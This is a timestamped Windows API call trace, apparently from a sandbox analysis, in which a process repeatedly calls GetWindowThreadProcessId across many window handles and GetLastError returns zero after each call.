	[0202.178] GetWindowThreadProcessId (in: hWnd=0x10234, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x950
	[0202.178] GetLastError () returned 0x0
	[0202.178] GetWindowThreadProcessId (in: hWnd=0x10230, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x940
	[0202.178] GetLastError () returned 0x0
	[0202.179] GetWindowThreadProcessId (in: hWnd=0x1022c, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x930
	[0202.179] GetLastError () returned 0x0
	[0202.179] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x920
	[0202.179] GetLastError () returned 0x0
	[0202.179] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x910
	[0202.179] GetLastError () returned 0x0
	[0202.179] GetWindowThreadProcessId (in: hWnd=0x10220, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x900
	[0202.179] GetLastError () returned 0x0
	[0202.179] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x8f0
	[0202.179] GetLastError () returned 0x0
	[0202.180] GetWindowThreadProcessId (in: hWnd=0x10218, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x8e0
	[0202.180] GetLastError () returned 0x0
	[0202.180] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x8d0
	[0202.180] GetLastError () returned 0x0
	[0202.180] GetWindowThreadProcessId (in: hWnd=0x10210, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x8c0
	[0202.180] GetLastError () returned 0x0
	[0202.180] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x8b0
	[0202.180] GetLastError () returned 0x0
	[0202.180] GetWindowThreadProcessId (in: hWnd=0x10208, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x8a0
	[0202.180] GetLastError () returned 0x0
	[0202.181] GetWindowThreadProcessId (in: hWnd=0x10204, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x890
	[0202.181] GetLastError () returned 0x0
	[0202.181] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x880
	[0202.181] GetLastError () returned 0x0
	[0202.181] GetWindowThreadProcessId (in: hWnd=0x101fc, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x870
	[0202.181] GetLastError () returned 0x0
	[0202.181] GetWindowThreadProcessId (in: hWnd=0x101f8, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x860
	[0202.181] GetLastError () returned 0x0
	[0202.181] GetWindowThreadProcessId (in: hWnd=0x101f4, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x850
	[0202.181] GetLastError () returned 0x0
	[0202.181] GetWindowThreadProcessId (in: hWnd=0x101f0, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x840
	[0202.181] GetLastError () returned 0x0
	[0202.182] GetWindowThreadProcessId (in: hWnd=0x101ec, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x830
	[0202.182] GetLastError () returned 0x0
	[0202.182] GetWindowThreadProcessId (in: hWnd=0x101e8, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x820
	[0202.182] GetLastError () returned 0x0
	[0202.182] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x810
	[0202.182] GetLastError () returned 0x0
	[0202.182] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x20c
	[0202.182] GetLastError () returned 0x0
	[0202.182] GetWindowThreadProcessId (in: hWnd=0x101dc, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x7c4
	[0202.182] GetLastError () returned 0x0
	[0202.183] GetWindowThreadProcessId (in: hWnd=0x101d8, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0xc0
	[0202.183] GetLastError () returned 0x0
	[0202.183] GetWindowThreadProcessId (in: hWnd=0x101d4, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x688
	[0202.183] GetLastError () returned 0x0
	[0202.183] GetWindowThreadProcessId (in: hWnd=0x101d0, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x6c0
	[0202.183] GetLastError () returned 0x0
	[0202.183] GetWindowThreadProcessId (in: hWnd=0x101cc, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x408
	[0202.183] GetLastError () returned 0x0
	[0202.183] GetWindowThreadProcessId (in: hWnd=0x101c8, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x7d4
	[0202.183] GetLastError () returned 0x0
	[0202.184] GetWindowThreadProcessId (in: hWnd=0x101c4, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x544
	[0202.184] GetLastError () returned 0x0
	[0202.184] GetWindowThreadProcessId (in: hWnd=0x101c0, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x540
	[0202.184] GetLastError () returned 0x0
	[0202.184] GetWindowThreadProcessId (in: hWnd=0x101bc, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x71c
	[0202.184] GetLastError () returned 0x0
	[0202.184] GetWindowThreadProcessId (in: hWnd=0x101b8, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x31c
	[0202.184] GetLastError () returned 0x0
	[0202.184] GetWindowThreadProcessId (in: hWnd=0x101b4, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x7ec
	[0202.184] GetLastError () returned 0x0
	[0202.185] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x5b8
	[0202.185] GetLastError () returned 0x0
	[0202.185] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x754
	[0202.185] GetLastError () returned 0x0
	[0202.185] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x664
	[0202.185] GetLastError () returned 0x0
	[0202.185] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x640
	[0202.185] GetLastError () returned 0x0
	[0202.186] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x700
	[0202.186] GetLastError () returned 0x0
	[0202.186] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x410
	[0202.186] GetLastError () returned 0x0
	[0202.186] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x7a0
	[0202.186] GetLastError () returned 0x0
	[0202.186] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x3b4
	[0202.186] GetLastError () returned 0x0
	[0202.186] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x5cc
	[0202.186] GetLastError () returned 0x0
	[0202.186] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x5d4
	[0202.187] GetLastError () returned 0x0
	[0202.187] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x7c0
	[0202.187] GetLastError () returned 0x0
	[0202.187] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x364
	[0202.187] GetLastError () returned 0x0
	[0202.187] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x240
	[0202.187] GetLastError () returned 0x0
	[0202.187] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x560
	[0202.187] GetLastError () returned 0x0
	[0202.187] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x57c
	[0202.187] GetLastError () returned 0x0
	[0202.187] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x7b0
	[0202.188] GetLastError () returned 0x0
	[0202.188] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x6a4
	[0202.188] GetLastError () returned 0x0
	[0202.188] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x32c
	[0202.188] GetLastError () returned 0x0
	[0202.188] GetWindowThreadProcessId (in: hWnd=0x20164, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x670
	[0202.188] GetLastError () returned 0x0
	[0202.188] GetWindowThreadProcessId (in: hWnd=0x30158, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4f0
	[0202.188] GetLastError () returned 0x0
	[0202.188] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x514
	[0202.188] GetLastError () returned 0x0
	[0202.188] GetWindowThreadProcessId (in: hWnd=0x1014c, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x50c
	[0202.189] GetLastError () returned 0x0
	[0202.189] GetWindowThreadProcessId (in: hWnd=0x20142, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x514
	[0202.189] GetLastError () returned 0x0
	[0202.189] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x50c
	[0202.189] GetLastError () returned 0x0
	[0202.189] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x514
	[0202.189] GetLastError () returned 0x0
	[0202.189] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4f0
	[0202.189] GetLastError () returned 0x0
	[0202.189] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4f0
	[0202.189] GetLastError () returned 0x0
	[0202.190] GetWindowThreadProcessId (in: hWnd=0x200a8, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x58c
	[0202.190] GetLastError () returned 0x0
	[0202.190] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x578
	[0202.190] GetLastError () returned 0x0
	[0202.190] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x458
	[0202.190] GetLastError () returned 0x0
	[0202.190] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x530
	[0202.190] GetLastError () returned 0x0
	[0202.190] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4ac
	[0202.190] GetLastError () returned 0x0
	[0202.190] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x508
	[0202.190] GetLastError () returned 0x0
	[0202.191] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4ac
	[0202.191] GetLastError () returned 0x0
	[0202.191] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4f4
	[0202.191] GetLastError () returned 0x0
	[0202.191] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4ac
	[0202.191] GetLastError () returned 0x0
	[0202.191] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4ac
	[0202.191] GetLastError () returned 0x0
	[0202.191] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x794
	[0202.191] GetLastError () returned 0x0
	[0202.191] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4ac
	[0202.192] GetLastError () returned 0x0
	[0202.192] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4ac
	[0202.192] GetLastError () returned 0x0
	[0202.192] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x458
	[0202.192] GetLastError () returned 0x0
	[0202.192] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x458
	[0202.192] GetLastError () returned 0x0
	[0202.192] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x448
	[0202.193] GetLastError () returned 0x0
	[0202.193] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x778
	[0202.193] GetLastError () returned 0x0
	[0202.193] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x458
	[0202.193] GetLastError () returned 0x0
	[0202.193] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x538
	[0202.193] GetLastError () returned 0x0
	[0202.193] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4ac
	[0202.193] GetLastError () returned 0x0
	[0202.193] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4ac
	[0202.193] GetLastError () returned 0x0
	[0202.194] GetWindowThreadProcessId (in: hWnd=0x30292, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x938
	[0202.194] GetLastError () returned 0x0
	[0202.194] GetWindowThreadProcessId (in: hWnd=0x30294, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x7c8
	[0202.194] GetLastError () returned 0x0
	[0202.194] GetWindowThreadProcessId (in: hWnd=0x3028a, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0xbdc
	[0202.194] GetLastError () returned 0x0
	[0202.194] GetWindowThreadProcessId (in: hWnd=0x5026c, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0xbe0
	[0202.194] GetLastError () returned 0x0
	[0202.194] GetWindowThreadProcessId (in: hWnd=0x6015a, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x9f4
	[0202.194] GetLastError () returned 0x0
	[0202.194] GetWindowThreadProcessId (in: hWnd=0x30296, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x964
	[0202.194] GetLastError () returned 0x0
	[0202.195] GetWindowThreadProcessId (in: hWnd=0x50116, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x9e8
	[0202.195] GetLastError () returned 0x0
	[0202.195] GetWindowThreadProcessId (in: hWnd=0x5011c, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x9e8
	[0202.195] GetLastError () returned 0x0
	[0202.195] GetWindowThreadProcessId (in: hWnd=0x30162, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0xb40
	[0202.195] GetLastError () returned 0x0
	[0202.195] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0xa00
	[0202.195] GetLastError () returned 0x0
	[0202.195] GetWindowThreadProcessId (in: hWnd=0x10260, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x9f0
	[0202.195] GetLastError () returned 0x0
	[0202.195] GetWindowThreadProcessId (in: hWnd=0x1025a, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x9e0
	[0202.196] GetLastError () returned 0x0
	[0202.196] GetWindowThreadProcessId (in: hWnd=0x10256, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x9d0
	[0202.196] GetLastError () returned 0x0
	[0202.196] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x9c0
	[0202.196] GetLastError () returned 0x0
	[0202.196] GetWindowThreadProcessId (in: hWnd=0x1024e, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x9b0
	[0202.196] GetLastError () returned 0x0
	[0202.196] GetWindowThreadProcessId (in: hWnd=0x1024a, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x9a0
	[0202.196] GetLastError () returned 0x0
	[0202.196] GetWindowThreadProcessId (in: hWnd=0x10246, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x990
	[0202.196] GetLastError () returned 0x0
	[0202.197] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x980
	[0202.197] GetLastError () returned 0x0
	[0202.197] GetWindowThreadProcessId (in: hWnd=0x1023e, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x970
	[0202.197] GetLastError () returned 0x0
	[0202.197] GetWindowThreadProcessId (in: hWnd=0x1023a, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x960
	[0202.197] GetLastError () returned 0x0
	[0202.197] GetWindowThreadProcessId (in: hWnd=0x10236, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x950
	[0202.197] GetLastError () returned 0x0
	[0202.197] GetWindowThreadProcessId (in: hWnd=0x10232, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x940
	[0202.197] GetLastError () returned 0x0
	[0202.197] GetWindowThreadProcessId (in: hWnd=0x1022e, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x930
	[0202.198] GetLastError () returned 0x0
	[0202.198] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x920
	[0202.198] GetLastError () returned 0x0
	[0202.198] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x910
	[0202.198] GetLastError () returned 0x0
	[0202.198] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x900
	[0202.198] GetLastError () returned 0x0
	[0202.198] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x8f0
	[0202.198] GetLastError () returned 0x0
	[0202.198] GetWindowThreadProcessId (in: hWnd=0x1021a, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x8e0
	[0202.198] GetLastError () returned 0x0
	[0202.198] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x8d0
	[0202.199] GetLastError () returned 0x0
	[0202.199] GetWindowThreadProcessId (in: hWnd=0x10212, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x8c0
	[0202.199] GetLastError () returned 0x0
	[0202.199] GetWindowThreadProcessId (in: hWnd=0x1020e, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x8b0
	[0202.199] GetLastError () returned 0x0
	[0202.199] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x8a0
	[0202.199] GetLastError () returned 0x0
	[0202.199] GetWindowThreadProcessId (in: hWnd=0x10206, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x890
	[0202.199] GetLastError () returned 0x0
	[0202.199] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x880
	[0202.199] GetLastError () returned 0x0
	[0202.200] GetWindowThreadProcessId (in: hWnd=0x101fe, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x870
	[0202.200] GetLastError () returned 0x0
	[0202.200] GetWindowThreadProcessId (in: hWnd=0x101fa, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x860
	[0202.200] GetLastError () returned 0x0
	[0202.200] GetWindowThreadProcessId (in: hWnd=0x101f6, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x850
	[0202.200] GetLastError () returned 0x0
	[0202.200] GetWindowThreadProcessId (in: hWnd=0x101f2, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x840
	[0202.200] GetLastError () returned 0x0
	[0202.200] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x830
	[0202.200] GetLastError () returned 0x0
	[0202.200] GetWindowThreadProcessId (in: hWnd=0x101ea, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x820
	[0202.200] GetLastError () returned 0x0
	[0202.201] GetWindowThreadProcessId (in: hWnd=0x101e6, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x810
	[0202.201] GetLastError () returned 0x0
	[0202.201] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x20c
	[0202.201] GetLastError () returned 0x0
	[0202.201] GetWindowThreadProcessId (in: hWnd=0x101de, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x7c4
	[0202.201] GetLastError () returned 0x0
	[0202.201] GetWindowThreadProcessId (in: hWnd=0x101da, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0xc0
	[0202.201] GetLastError () returned 0x0
	[0202.201] GetWindowThreadProcessId (in: hWnd=0x101d6, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x688
	[0202.201] GetLastError () returned 0x0
	[0202.201] GetWindowThreadProcessId (in: hWnd=0x101d2, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x6c0
	[0202.202] GetLastError () returned 0x0
	[0202.202] GetWindowThreadProcessId (in: hWnd=0x101ce, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x408
	[0202.202] GetLastError () returned 0x0
	[0202.202] GetWindowThreadProcessId (in: hWnd=0x101ca, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x7d4
	[0202.202] GetLastError () returned 0x0
	[0202.202] GetWindowThreadProcessId (in: hWnd=0x101c6, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x544
	[0202.202] GetLastError () returned 0x0
	[0202.202] GetWindowThreadProcessId (in: hWnd=0x101c2, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x540
	[0202.202] GetLastError () returned 0x0
	[0202.202] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x71c
	[0202.202] GetLastError () returned 0x0
	[0202.203] GetWindowThreadProcessId (in: hWnd=0x101ba, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x31c
	[0202.203] GetLastError () returned 0x0
	[0202.203] GetWindowThreadProcessId (in: hWnd=0x101b6, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x7ec
	[0202.203] GetLastError () returned 0x0
	[0202.203] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x5b8
	[0202.203] GetLastError () returned 0x0
	[0202.203] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x754
	[0202.203] GetLastError () returned 0x0
	[0202.203] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x664
	[0202.203] GetLastError () returned 0x0
	[0202.203] GetWindowThreadProcessId (in: hWnd=0x2017a, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x640
	[0202.203] GetLastError () returned 0x0
	[0202.204] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x700
	[0202.204] GetLastError () returned 0x0
	[0202.204] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x410
	[0202.204] GetLastError () returned 0x0
	[0202.204] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x7a0
	[0202.204] GetLastError () returned 0x0
	[0202.204] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x3b4
	[0202.204] GetLastError () returned 0x0
	[0202.204] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x5cc
	[0202.204] GetLastError () returned 0x0
	[0202.204] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x5d4
	[0202.204] GetLastError () returned 0x0
	[0202.205] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x7c0
	[0202.205] GetLastError () returned 0x0
	[0202.205] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x364
	[0202.205] GetLastError () returned 0x0
	[0202.205] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x240
	[0202.205] GetLastError () returned 0x0
	[0202.205] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x560
	[0202.205] GetLastError () returned 0x0
	[0202.205] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x57c
	[0202.205] GetLastError () returned 0x0
	[0202.205] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x7b0
	[0202.206] GetLastError () returned 0x0
	[0202.206] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x6a4
	[0202.206] GetLastError () returned 0x0
	[0202.206] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x32c
	[0202.206] GetLastError () returned 0x0
	[0202.206] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x670
	[0202.206] GetLastError () returned 0x0
	[0202.206] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x50c
	[0202.206] GetLastError () returned 0x0
	[0202.206] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x514
	[0202.206] GetLastError () returned 0x0
	[0202.206] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4f0
	[0202.207] GetLastError () returned 0x0
	[0202.207] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x58c
	[0202.207] GetLastError () returned 0x0
	[0202.207] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x458
	[0202.207] GetLastError () returned 0x0
	[0202.207] GetWindowThreadProcessId (in: hWnd=0x10086, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x4f4
	[0202.207] GetLastError () returned 0x0
	[0202.207] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x794
	[0202.207] GetLastError () returned 0x0
